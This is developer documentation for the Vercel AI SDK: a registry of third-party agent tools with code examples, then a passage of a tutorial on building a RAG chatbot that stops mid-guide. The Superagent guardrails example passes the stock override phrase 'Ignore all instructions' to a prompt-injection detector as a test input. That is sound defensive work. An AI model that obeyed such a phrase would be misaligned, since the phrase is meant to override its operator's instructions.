◆ Output Preview

// CONTRIBUTING GUIDE // https://github.com/vercel/ai/blob/main/contributing/add-new-tool-to-registry.md

export interface Tool { slug: string; name: string; description: string; packageName: string; tags?: string[]; apiKeyEnvName?: string; installCommand: { pnpm: string; npm: string; yarn: string; bun: string; }; codeExample: string; docsUrl?: string; apiKeyUrl?: string; websiteUrl?: string; npmUrl?: string; }

export const tools: Tool[] = [ { slug: 'code-execution', name: 'Code Execution', description: 'Execute Python code in a sandboxed environment using Vercel Sandbox. Run calculations, data processing, and other computational tasks safely in an isolated environment with Python 3.13.', packageName: 'ai-sdk-tool-code-execution', tags: ['code-execution', 'sandbox'], apiKeyEnvName: 'VERCEL_OIDC_TOKEN', installCommand: { pnpm: 'pnpm add ai-sdk-tool-code-execution', npm: 'npm install ai-sdk-tool-code-execution', yarn: 'yarn add ai-sdk-tool-code-execution', bun: 'bun add ai-sdk-tool-code-execution', }, codeExample: `import { generateText, stepCountIs } from 'ai'; import { executeCode } from 'ai-sdk-tool-code-execution';

const { text } = await generateText({ model: 'openai/gpt-5.1-codex', prompt: 'What is 5 + 5 minus 84 cubed?', tools: { executeCode: executeCode(), }, stopWhen: stepCountIs(5), });

console.log(text);, docsUrl: 'https://vercel.com/docs/vercel-sandbox', apiKeyUrl: 'https://vercel.com/docs/vercel-sandbox#authentication', websiteUrl: 'https://vercel.com/docs/vercel-sandbox', npmUrl: 'https://www.npmjs.com/package/ai-sdk-tool-code-execution', }, { slug: 'exa', name: 'Exa', description: 'Exa is a web search API that adds web search capabilities to your LLMs. Exa can search the web for code docs, current information, news, articles, and a lot more. Exa performs real-time web searches and can get page content from specific URLs. Add Exa web search tool to your LLMs in just a few lines of code.', packageName: '@exalabs/ai-sdk', tags: ['search', 'web', 'extraction'], apiKeyEnvName: 'EXA_API_KEY', installCommand: { pnpm: 'pnpm add @exalabs/ai-sdk', npm: 'npm install @exalabs/ai-sdk', yarn: 'yarn add @exalabs/ai-sdk', bun: 'bun add @exalabs/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { webSearch } from '@exalabs/ai-sdk';

const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'Tell me the latest developments in AI', tools: { webSearch: webSearch(), }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.exa.ai/reference/vercel', apiKeyUrl: 'https://dashboard.exa.ai/api-keys', websiteUrl: 'https://exa.ai', npmUrl: 'https://www.npmjs.com/package/@exalabs/ai-sdk', }, { slug: 'parallel', name: 'Parallel', description: 'Parallel gives AI agents best-in-class tools to search and extract context from the web. Web results returned by Parallel are compressed for optimal token efficiency at inference time.', packageName: '@parallel-web/ai-sdk-tools', tags: ['search', 'web', 'extraction'], apiKeyEnvName: 'PARALLEL_API_KEY', installCommand: { pnpm: 'pnpm add @parallel-web/ai-sdk-tools', npm: 'npm install @parallel-web/ai-sdk-tools', yarn: 'yarn add @parallel-web/ai-sdk-tools', bun: 'bun add @parallel-web/ai-sdk-tools', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { searchTool, extractTool } from '@parallel-web/ai-sdk-tools';

const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'When was Vercel Ship AI?', tools: { webSearch: searchTool, webExtract: extractTool, }, stopWhen: stepCountIs(3), });

console.log(text);, apiKeyUrl: 'https://platform.parallel.ai', websiteUrl: 'https://parallel.ai', npmUrl: 'https://www.npmjs.com/package/@parallel-web/ai-sdk-tools', }, { slug: 'ctx-zip', name: 'ctx-zip', description: 'Transform MCP tools and AI SDK tools into code, write it to a Vercel sandbox file system and have the agent import the tools, write code, and execute it.', packageName: 'ctx-zip', tags: ['code-execution', 'sandbox', 'mcp', 'code-mode'], apiKeyEnvName: 'VERCEL_OIDC_TOKEN', installCommand: { pnpm: 'pnpm add ctx-zip', npm: 'npm install ctx-zip', yarn: 'yarn add ctx-zip', bun: 'bun add ctx-zip', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { createVercelSandboxCodeMode, SANDBOX_SYSTEM_PROMPT } from 'ctx-zip';

const { tools } = await createVercelSandboxCodeMode({ servers: [ { name: 'vercel', url: 'https://mcp.vercel.com', useSSE: false, headers: { Authorization: `Bearer ${process.env.VERCEL_API_KEY}`, }, }, ], standardTools: { weather: weatherTool, }, });

const { text } = await generateText({ model: 'openai/gpt-5.2', tools, stopWhen: stepCountIs(20), system: SANDBOX_SYSTEM_PROMPT, messages: [ { role: 'user', content: 'What tools are available from the Vercel MCP server?', }, ], });

console.log(text); , docsUrl: 'https://github.com/karthikscale3/ctx-zip/blob/main/README.md', apiKeyUrl: 'https://vercel.com/docs/vercel-sandbox#authentication', websiteUrl: 'https://github.com/karthikscale3/ctx-zip/blob/main/README.md', npmUrl: 'https://www.npmjs.com/package/ctx-zip', }, { slug: 'perplexity-search', name: 'Perplexity Search', description: "Search the web with real-time results and advanced filtering powered by Perplexity's Search API. Provides ranked search results with domain, language, date range, and recency filters. Supports multi-query searches and regional search results.", packageName: '@perplexity-ai/ai-sdk', tags: ['search', 'web'], apiKeyEnvName: 'PERPLEXITY_API_KEY', installCommand: { pnpm: 'pnpm add @perplexity-ai/ai-sdk', npm: 'npm install @perplexity-ai/ai-sdk', yarn: 'yarn add @perplexity-ai/ai-sdk', bun: 'bun add @perplexity-ai/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { perplexitySearch } from '@perplexity-ai/ai-sdk';

const { text } = await generateText({ model: 'openai/gpt-5.2', prompt: 'What are the latest AI developments? Use search to find current information.', tools: { search: perplexitySearch(), }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.perplexity.ai/guides/search-quickstart', apiKeyUrl: 'https://www.perplexity.ai/account/api/keys', websiteUrl: 'https://www.perplexity.ai', npmUrl: 'https://www.npmjs.com/package/@perplexity-ai/ai-sdk', }, { slug: 'tavily', name: 'Tavily', description: 'Tavily is a web intelligence platform offering real-time web search optimized for AI applications. Tavily provides comprehensive web research capabilities including search, content extraction, website crawling, and site mapping to power AI agents with current information.', packageName: '@tavily/ai-sdk', tags: ['search', 'extract', 'crawl'], apiKeyEnvName: 'TAVILY_API_KEY', installCommand: { pnpm: 'pnpm add @tavily/ai-sdk', npm: 'npm install @tavily/ai-sdk', yarn: 'yarn add @tavily/ai-sdk', bun: 'bun add @tavily/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { tavilySearch } from '@tavily/ai-sdk';

const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'What are the latest developments in agentic search?', tools: { webSearch: tavilySearch, }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.tavily.com/documentation/integrations/vercel', apiKeyUrl: 'https://app.tavily.com/home', websiteUrl: 'https://tavily.com', npmUrl: 'https://www.npmjs.com/package/@tavily/ai-sdk', }, { slug: 'firecrawl', name: 'Firecrawl', description: 'Firecrawl tools for the AI SDK. Web scraping, search, crawling, and data extraction for AI applications. Scrape any website into clean markdown, search the web, crawl entire sites, and extract structured data.', packageName: 'firecrawl-aisdk', tags: ['scraping', 'search', 'crawling', 'extraction', 'web'], apiKeyEnvName: 'FIRECRAWL_API_KEY', installCommand: { pnpm: 'pnpm add firecrawl-aisdk', npm: 'npm install firecrawl-aisdk', yarn: 'yarn add firecrawl-aisdk', bun: 'bun add firecrawl-aisdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { scrapeTool } from 'firecrawl-aisdk';

const { text } = await generateText({ model: 'openai/gpt-5-mini', prompt: 'Scrape https://firecrawl.dev and summarize what it does', tools: { scrape: scrapeTool, }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.firecrawl.dev/integrations/ai-sdk', apiKeyUrl: 'https://firecrawl.dev/app/api-keys', websiteUrl: 'https://firecrawl.dev', npmUrl: 'https://www.npmjs.com/package/firecrawl-aisdk', }, { slug: 'bedrock-agentcore', name: 'Amazon Bedrock AgentCore', description: 'Fully managed Browser and Code Interpreter tools for AI agents. Browser is a fast and secure cloud-based runtime for interacting with web applications, filling forms, navigating websites, and extracting information. Code Interpreter provides an isolated sandbox for executing Python, JavaScript, and TypeScript code to solve complex tasks.', packageName: 'bedrock-agentcore', tags: ['code-execution', 'browser-automation', 'sandbox'], apiKeyEnvName: 'AWS_ROLE_ARN', installCommand: { pnpm: 'pnpm add bedrock-agentcore', npm: 'npm install bedrock-agentcore', yarn: 'yarn add bedrock-agentcore', bun: 'bun add bedrock-agentcore', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { bedrock } from '@ai-sdk/amazon-bedrock'; import { awsCredentialsProvider } from '@vercel/oidc-aws-credentials-provider'; import { CodeInterpreterTools } from 'bedrock-agentcore/code-interpreter/vercel-ai'; import { BrowserTools } from 'bedrock-agentcore/browser/vercel-ai';

const credentialsProvider = awsCredentialsProvider({ roleArn: process.env.AWS_ROLE_ARN!, });

const codeInterpreter = new CodeInterpreterTools({ credentialsProvider }); const browser = new BrowserTools({ credentialsProvider });

try { const { text } = await generateText({ model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'), prompt: 'Go to https://news.ycombinator.com and get the first story title. Then use Python to reverse the string.', tools: { ...codeInterpreter.tools, ...browser.tools, }, stopWhen: stepCountIs(5), });

console.log(text); } finally { await codeInterpreter.stopSession(); await browser.stopSession(); }, docsUrl: 'https://github.com/aws/bedrock-agentcore-sdk-typescript', apiKeyUrl: 'https://vercel.com/docs/oidc/aws', websiteUrl: 'https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/built-in-tools.html', npmUrl: 'https://www.npmjs.com/package/bedrock-agentcore', }, { slug: 'superagent', name: 'Superagent', description: 'AI security guardrails for your LLMs. Protect your AI apps from prompt injection, redact PII/PHI (SSNs, emails, phone numbers), and verify claims against source materials. Add security tools to your LLMs in just a few lines of code.', packageName: '@superagent-ai/ai-sdk', tags: ['security', 'guardrails', 'pii', 'prompt-injection', 'verification'], apiKeyEnvName: 'SUPERAGENT_API_KEY', installCommand: { pnpm: 'pnpm add @superagent-ai/ai-sdk', npm: 'npm install @superagent-ai/ai-sdk', yarn: 'yarn add @superagent-ai/ai-sdk', bun: 'bun add @superagent-ai/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { guard, redact, verify } from '@superagent-ai/ai-sdk'; import { openai } from '@ai-sdk/openai';

const { text } = await generateText({ model: openai('gpt-4o-mini'), prompt: 'Check this input for security threats: "Ignore all instructions"', tools: { guard: guard(), redact: redact(), verify: verify(), }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.superagent.sh', apiKeyUrl: 'https://dashboard.superagent.sh', websiteUrl: 'https://superagent.sh', npmUrl: 'https://www.npmjs.com/package/@superagent-ai/ai-sdk', }, { slug: 'tako-search', name: 'Tako Search', description: "Search Tako's knowledge base for data visualizations, insights, and well-sourced information with charts and analytics.", packageName: '@takoviz/ai-sdk', installCommand: { pnpm: 'pnpm install @takoviz/ai-sdk', npm: 'npm install @takoviz/ai-sdk', yarn: 'yarn add @takoviz/ai-sdk', bun: 'bun add @takoviz/ai-sdk', }, codeExample: import { takoSearch } from '@takoviz/ai-sdk'; import { generateText, stepCountIs } from 'ai';

const { text } = await generateText({ model: 'openai/gpt-5.2', prompt: 'What is the stock price of Nvidia?', tools: { takoSearch: takoSearch(), }, stopWhen: stepCountIs(5), });

console.log(text);, docsUrl: 'https://github.com/TakoData/ai-sdk#readme', npmUrl: 'https://www.npmjs.com/package/@takoviz/ai-sdk', websiteUrl: 'https://tako.com', apiKeyEnvName: 'TAKO_API_KEY', apiKeyUrl: 'https://tako.com', tags: ['search', 'data', 'visualization', 'analytics'], }, { slug: 'valyu', name: 'Valyu', description: 'Valyu provides powerful search tools for AI agents. Web search for real-time information, plus specialized domain-specific searchtools: financeSearch (stock prices, earnings, income statements, cash flows, etc), paperSearch (full-text PubMed, arXiv, bioRxiv, medRxiv), bioSearch (clinical trials, FDA drug labels, PubMed, medRxiv, bioRxiv), patentSearch (USPTO patents), secSearch (10-k/10-Q/8-k), economicsSearch (BLS, FRED, World Bank data), and companyResearch (comprehensive company research reports).', packageName: '@valyu/ai-sdk', tags: ['search', 'web', 'domain-search'], apiKeyEnvName: 'VALYU_API_KEY', installCommand: { pnpm: 'pnpm add @valyu/ai-sdk', npm: 'npm install @valyu/ai-sdk', yarn: 'yarn add @valyu/ai-sdk', bun: 'bun add @valyu/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { webSearch } from '@valyu/ai-sdk'; // Available specialised search tools: financeSearch, paperSearch, // bioSearch, patentSearch, secSearch, economicsSearch, companyResearch

const { text } = await generateText({ model: 'google/gemini-3-pro-preview', prompt: 'Latest data center projects for AI inference?', tools: { webSearch: webSearch(), }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.valyu.ai/integrations/vercel-ai-sdk', apiKeyUrl: 'https://platform.valyu.ai', websiteUrl: 'https://valyu.ai', npmUrl: 'https://www.npmjs.com/package/@valyu/ai-sdk', }, { slug: 'airweave', name: 'Airweave', description: 'Airweave is an open-source platform that makes any app searchable for your agent. Sync and search across 35+ data sources (Notion, Slack, Google Drive, databases, and more) with semantic search. Add unified search across all your connected data to your AI applications in just a few lines of code.', packageName: '@airweave/vercel-ai-sdk', tags: ['search', 'rag', 'data-sources', 'semantic-search'], apiKeyEnvName: 'AIRWEAVE_API_KEY', installCommand: { pnpm: 'pnpm install @airweave/vercel-ai-sdk', npm: 'npm install @airweave/vercel-ai-sdk', yarn: 'yarn add @airweave/vercel-ai-sdk', bun: 'bun add @airweave/vercel-ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { airweaveSearch } from '@airweave/vercel-ai-sdk';

const { text } = await generateText({ model: 'anthropic/claude-sonnet-4.5', prompt: 'What were the key decisions from last week?', tools: { search: airweaveSearch({ defaultCollection: 'my-knowledge-base', }), }, stopWhen: stepCountIs(3), });

console.log(text);, docsUrl: 'https://docs.airweave.ai', apiKeyUrl: 'https://app.airweave.ai/settings/api-keys', websiteUrl: 'https://airweave.ai', npmUrl: 'https://www.npmjs.com/package/@airweave/vercel-ai-sdk', }, { slug: 'bash-tool', name: 'bash-tool', description: 'Provides bash, readFile, and writeFile tools for AI agents. Supports @vercel/sandbox for full VM isolation.', packageName: 'bash-tool', tags: ['bash', 'file-system', 'sandbox', 'code-execution'], installCommand: { pnpm: 'pnpm install bash-tool', npm: 'npm install bash-tool', yarn: 'yarn add bash-tool', bun: 'bun add bash-tool', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { createBashTool } from 'bash-tool';

const { tools } = await createBashTool({ files: { 'src/index.ts': "export const hello = 'world';" }, });

const { text } = await generateText({ model: 'anthropic/claude-sonnet-4', prompt: 'List the files in src/ and show me the contents of index.ts', tools, stopWhen: stepCountIs(5), });

console.log(text);, docsUrl: 'https://github.com/vercel/bash-tool', websiteUrl: 'https://github.com/vercel/bash-tool', npmUrl: 'https://www.npmjs.com/package/bash-tool', }, { slug: 'browserbase', name: 'Browserbase', description: 'Browserbase provides browser automation tools for AI agents powered by Stagehand. Navigate websites, take screenshots, click buttons, fill forms, extract structured data, and execute multi-step browser tasks in cloud-hosted sessions with built-in CAPTCHA solving and anti-bot stealth mode.', packageName: '@browserbasehq/ai-sdk', tags: ['browser', 'browser-automation', 'web', 'extraction'], apiKeyEnvName: 'BROWSERBASE_API_KEY', installCommand: { pnpm: 'pnpm add @browserbasehq/ai-sdk', npm: 'npm install @browserbasehq/ai-sdk', yarn: 'yarn add @browserbasehq/ai-sdk', bun: 'bun add @browserbasehq/ai-sdk', }, codeExample: import { generateText, stepCountIs } from 'ai'; import { createBrowserbaseTools } from '@browserbasehq/ai-sdk';

const browserbase = createBrowserbaseTools();

const { text } = await generateText({ model: 'google/gemini-3-pro-preview', tools: browserbase.tools, stopWhen: stepCountIs(10), prompt: 'Open https://news.ycombinator.com and summarize the top 3 stories.', });

console.log(text); await browserbase.closeSession();`, docsUrl: 'https://docs.browserbase.com', apiKeyUrl: 'https://www.browserbase.com/settings', websiteUrl: 'https://www.browserbase.com', npmUrl: 'https://www.npmjs.com/package/@browserbasehq/ai-sdk', }, ];

title: RAG Agent description: Learn how to build a RAG Agent with the AI SDK and Next.js

RAG Chatbot Guide

In this guide, you will learn how to build a retrieval-augmented generation (RAG) Agent.

Before we dive in, let's look at what RAG is, and why we would want to use it.

What is RAG?

RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.

Why is RAG important?

While LLMs are powerful, the information they can reason on is restricted to the data they were trained on. This problem becomes apparent when asking an LLM for information outside of their training data, like proprietary data or common knowledge that has occurred after the model’s training cutoff. RAG solves this problem by fetching information relevant to the prompt and then passing that to the model as context.

To illustrate with a basic example, imagine asking the model for your favorite food:

**input**
What is my favorite food?

**generation**
I don't have access to personal information about individuals, including their
favorite foods.

Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:

**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets

**generation**
Your favorite food is chicken nuggets!

Just like that, you have augmented the model’s generation by providing relevant information to the query. Assuming the model has the appropriate information, it is now highly likely to return an accurate response to the users query. But how does it retrieve the relevant information? The answer relies on a concept called embedding.

Embedding

Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.

In practice, this means that if you embedded the words cat and dog, you would expect them to be plotted close to each other in vector space. The process of calculating the similarity between two vectors is called ‘cosine similarity’ where a value of 1 would indicate high similarity and a value of -1 would indicate high opposition.

As mentioned above, embeddings are a way to represent the semantic meaning of words and phrases. The implication here is that the larger the input to your embedding, the lower quality the embedding will be. So how would you approach embedding content longer than a simple phrase?

Chunking

Chunking refers to the process of breaking down a particular source material into smaller pieces. There are many different approaches to chunking and it’s worth experimenting as the most effective approach can differ by use case. A simple and common approach to chunking (and what you will be using in this guide) is separating written content by sentences.

Once your source material is appropriately chunked, you can embed each one and then store the embedding and the chunk together in a database. Embeddings can be stored in any database that supports vectors. For this tutorial, you will be using Postgres alongside the pgvector plugin.

All Together Now

Combining all of this together, RAG is the process of enabling the model to respond with information outside of it’s training data by embedding a users query, retrieving the relevant source material (chunks) with the highest semantic similarity, and then passing them alongside the initial query as context. Going back to the example where you ask the model for your favorite food, the prompt preparation process would look like this.

By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.

Onto the project!

Project Setup

In this project, you will build a chatbot that will only respond with information that it has within its knowledge base. The chatbot will be able to both store and retrieve information. This project has many interesting use cases from customer support through to building your own second brain!

This project will use the following stack:

Next.js 14 (App Router)
AI SDK
OpenAI
Drizzle ORM
Postgres with pgvector
shadcn-ui and TailwindCSS for styling

Clone Repo

To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:

Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
a basic schema for the resources table (this will be for source material)
a Server Action for creating a resource

To get started, clone the starter repository with the following command:

First things first, run the following command to install the project’s dependencies:

Create Database

You will need a Postgres database to complete this tutorial. If you don’t have Postgres setup on your local machine you can:

Create a free Postgres database with Vercel Postgres; or
Follow this guide to set it up locally

Migrate Database

Once you have a Postgres database, you need to add the connection string as an environment secret.

Make a copy of the .env.example file and rename it to .env.

Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.

With that set up, you can now run your first database migration. Run the following command:

This will first add the pgvector extension to your database. Then it will create a new table for your resources schema that is defined in lib/db/schema/resources.ts. This schema has four columns: id, content, createdAt, and updatedAt.

OpenAI API Key

For this guide, you will need an OpenAI API key. To generate an API key, go to platform.openai.com.

Once you have your API key, paste it into your .env file (OPENAI_API_KEY).

Build

Let’s build a quick task list of what needs to be done:

Create a table in your database to store embeddings
Add logic to chunk and create embeddings when creating resources
Create a chatbot
Give the chatbot tools to query / create resources for it’s knowledge base

Create Embeddings Table

Currently, your application has one table (resources) which has a column (content) for storing content. Remember, each resource (source material) will have to be chunked, embedded, and then stored. Let’s create a table called embeddings to store these chunks.

Create a new file (lib/db/schema/embeddings.ts) and add the following code:

import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';

export const embeddings = pgTable(
  'embeddings',
  {
    id: varchar('id', { length: 191 })
      .primaryKey()
      .$defaultFn(() => nanoid()),
    resourceId: varchar('resource_id', { length: 191 }).references(
      () => resources.id,
      { onDelete: 'cascade' },
    ),
    content: text('content').notNull(),
    embedding: vector('embedding', { dimensions: 1536 }).notNull(),
  },
  table => ({
    embeddingIndex: index('embeddingIndex').using(
      'hnsw',
      table.embedding.op('vector_cosine_ops'),
    ),
  }),
);

This table has four columns:

id - unique identifier
resourceId - a foreign key relation to the full source material
content - the plain text chunk
embedding - the vector representation of the plain text chunk

To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.

To push this change to the database, run the following command:

Add Embedding Logic

Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.

Create a file with the following command:

Generate Chunks

Remember, to create an embedding, you will start with a piece of source material (unknown length), break it down into smaller chunks, embed each chunk, and then save the chunk to the database. Let’s start by creating a function to break the source material into small chunks.

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

This function will take an input string and split it by periods, filtering out any empty items. This will return an array of strings. It is worth experimenting with different chunking techniques in your projects as the best technique will vary.

Install AI SDK

You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:

This will install the AI SDK, AI SDK's React hooks, and AI SDK's OpenAI provider.

Generate Embeddings

Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.

import { embedMany } from 'ai';
import { openai } from '@ai-sdk/openai';

const embeddingModel = openai.embedding('text-embedding-ada-002');

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.

Next, you create an asynchronous function called generateEmbeddings. This function will take in the source material (value) as an input and return a promise of an array of objects, each containing an embedding and content. Within the function, you first generate chunks for the input. Then, you pass those chunks to the embedMany function imported from the AI SDK which will return embeddings of the chunks you passed in. Finally, you map over and return the embeddings in a format that is ready to save in the database.

Update Server Action

Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    return 'Resource successfully created.';
  } catch (e) {
    if (e instanceof Error)
      return e.message.length > 0 ? e.message : 'Error, please try again.';
  }
};

This function is a Server Action, as denoted by the “use server”; directive at the top of the file. This means that it can be called anywhere in your Next.js application. This function will take an input, run it through a Zod schema to ensure it adheres to the correct schema, and then creates a new resource in the database. This is the ideal location to generate and store embeddings of the newly created resources.

Update the file with the following code:

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    const embeddings = await generateEmbeddings(content);
    await db.insert(embeddingsTable).values(
      embeddings.map(embedding => ({
        resourceId: resource.id,
        ...embedding,
      })),
    );

    return 'Resource successfully created and embedded.';
  } catch (error) {
    return error instanceof Error && error.message.length > 0
      ? error.message
      : 'Error, please try again.';
  }
};

First, you call the generateEmbeddings function created in the previous step, passing in the source material (content). Once you have your embeddings (e) of the source material, you can save them to the database, passing the resourceId alongside each embedding.

Create Root Page

Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your chatbot application.

Replace your root page (app/page.tsx) with the following code.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              <p>{m.content}</p>
            </div>
          </div>
        ))}
      </div>

      <form onSubmit={handleSubmit}>
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI), manages the state for chat input, and updates the UI automatically as new messages are received.

Run the following command to start the Next.js dev server:

Head to http://localhost:3000. You should see an empty screen with an input bar floating at the bottom. Try to send a message. The message shows up in the UI for a fraction of a second and then disappears. This is because you haven’t set up the corresponding API route to call the model! By default, useChat will send a POST request to the /api/chat endpoint with the messages as the request body.

You can customize the endpoint in the useChat configuration object

Create API Route

In Next.js, you can create custom request handlers for a given route using Route Handlers. Route Handlers are defined in a route.ts file and can export HTTP methods like GET, POST, PUT, PATCH etc.

Create a file at app/api/chat/route.ts by running the following command:

Open the file and add the following code:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
  });

  return result.toDataStreamResponse();
}

In this code, you declare and export an asynchronous function called POST. You retrieve the messages from the request body and then pass them to the streamText function imported from the AI SDK, alongside the model you would like to use. Finally, you return the model’s response in AIStreamResponse format.

Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!

Refining your prompt

While you now have a working chatbot, it isn't doing anything special.

Let’s add system instructions to refine and restrict the model’s behavior. In this case, you want the model to only use information it has retrieved to generate responses. Update your route handler with the following code:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages,
  });

  return result.toDataStreamResponse();
}

Head back to the browser and try to ask the model what your favorite food is. The model should now respond exactly as you instructed above (“Sorry, I don’t know”) given it doesn’t have any relevant information.

In its current form, your chatbot is now, well, useless. How do you give the model the ability to add and query information?

Using Tools

A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.

Let’s see how you can create a tool to give the model the ability to create, embed and save a resource to your chatbots’ knowledge base.

Add Resource Tool

Update your route handler with the following code:

import { createResource } from '@/lib/actions/resources';
import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages,
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        parameters: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toDataStreamResponse();
}

In this code, you define a tool called addResource. This tool has three elements:

description: description of the tool that will influence when the tool is picked.
parameters: Zod schema that defines the parameters necessary for the tool to run.
execute: An asynchronous function that is called with the arguments from the tool call.

In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the parameters from the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.

Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.

This will start Drizzle Studio where we can view the rows in our database. You should see a new row in both the embeddings and resources table with your favorite food!

Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              <p>
                {m.content.length > 0 ? (
                  m.content
                ) : (
                  <span className="italic font-light">
                    {'calling tool: ' + m?.toolInvocations?.[0].toolName}
                  </span>
                )}
              </p>
            </div>
          </div>
        ))}
      </div>

      <form onSubmit={handleSubmit}>
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

With this change, you now conditionally render the tool that has been called directly in the UI. Save the file and head back to browser. Tell the model your favorite movie. You should see which tool is called in place of the model’s typical text response.

Improving UX with Multi-Step Calls

It would be nice if the model could summarize the action too. However, technically, once the model calls a tool, it has completed its generation as it ‘generated’ a tool call. How could you achieve this desired behaviour?
